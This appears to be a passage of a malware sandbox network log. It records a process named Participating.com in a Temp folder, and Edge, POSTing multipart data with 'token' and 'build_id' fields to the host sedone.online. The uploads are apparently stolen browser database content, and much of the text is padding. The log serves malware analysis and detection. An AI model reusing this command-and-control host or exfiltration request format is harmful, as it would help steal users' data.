                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:09 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                15192.168.2.849744116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:09 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GV
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 493
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:09 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------V3WLNGD26F3EU3W4O8GVCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:09 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                16192.168.2.849759116.203.12.1144437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:15 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----SR1DBSJMYMYM7QI5FCJM
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 3165
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:15 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------SR1DBSJMYMYM7QI5FCJMContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------SR1DBSJMYMYM7QI5FCJMContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------SR1DBSJMYMYM7QI5FCJMCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:16 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                17192.168.2.849768116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EC2N7Q9Z58YMYU37GVSR
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 207993
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------EC2N7Q9Z58YMYU37GVSRContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------EC2N7Q9Z58YMYU37GVSRContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------EC2N7Q9Z58YMYU37GVSRCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
